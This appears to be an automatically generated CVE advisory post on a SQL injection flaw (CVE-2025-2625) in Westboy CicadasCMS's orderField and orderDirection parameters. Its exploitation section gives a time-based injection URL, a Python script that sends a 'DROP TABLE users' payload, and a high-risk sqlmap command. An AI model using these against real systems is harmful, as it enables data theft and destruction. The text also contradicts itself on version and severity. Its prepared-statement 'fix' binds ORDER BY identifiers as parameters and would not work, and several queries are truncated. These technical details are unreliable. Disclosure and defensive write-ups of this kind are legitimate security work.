Westboy CicadasCMS 10, SQL Injection, CVE-2025-2625 (Critical)

By /

The CVE-2025-2625 vulnerability in Westboy CicadasCMS 1.0 allows remote attackers to execute arbitrary SQL queries via the `orderField` and `orderDirection` parameters in /system/cms/content/page. This occurs due to improper input sanitization, enabling SQL injection when these parameters are directly concatenated into SQL statements. Attackers can manipulate these fields to inject malicious SQL payloads, potentially leading to unauthorized data access, modification, or database compromise. The vulnerability is remotely exploitable with low attack complexity, requiring only low privileges.

DailyCVE Form:

Platform: Westboy CicadasCMS
Version: 1.0
Vulnerability: SQL Injection
Severity: Critical
Date: 03/26/2025

What Undercode Say:

Exploitation:

1. Payload Example:

/system/cms/content/page?orderField=id;(SELECT SLEEP(5))--&orderDirection=ASC

2. Automated Exploit (Python):

import requests
target = "http://target.com/system/cms/content/page"
payload = {"orderField": "1; DROP TABLE users--", "orderDirection": "ASC"}
response = requests.get(target, params=payload)

3. SQLMap Command:

sqlmap -u "http://target.com/system/cms/content/page?orderField=test&orderDirection=ASC" --risk=3 --level=5

Protection:

1. Patch: Apply vendor updates immediately.

2. Input Sanitization: Use prepared statements:

$stmt = $db->prepare("SELECT FROM pages ORDER BY ? ?");
$stmt->bind_param("ss", $orderField, $orderDirection);

3. WAF Rules: Block suspicious SQL keywords in orderField/orderDirection.
4. Logging: Monitor for unusual SQL errors in logs.

Analytics:

  • CVSS 4.0: AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L (5.3 Medium)
  • Affected Systems: CicadasCMS 1.0 installations with default configs.
  • Exploit Availability: Publicly disclosed, weaponized likely.

Detection:

grep -r "orderField.ORDER BY" /var/www/cicadascms/

-- Database audit query:
SELECT FROM mysql.general_log WHERE argument LIKE "%orderField%";

Mitigation Steps:

1. Disable direct parameter passing to SQL queries.

2. Restrict database user permissions.

3. Implement rate limiting on `/system/cms/content/page`.

References:

References:

Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-2625
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top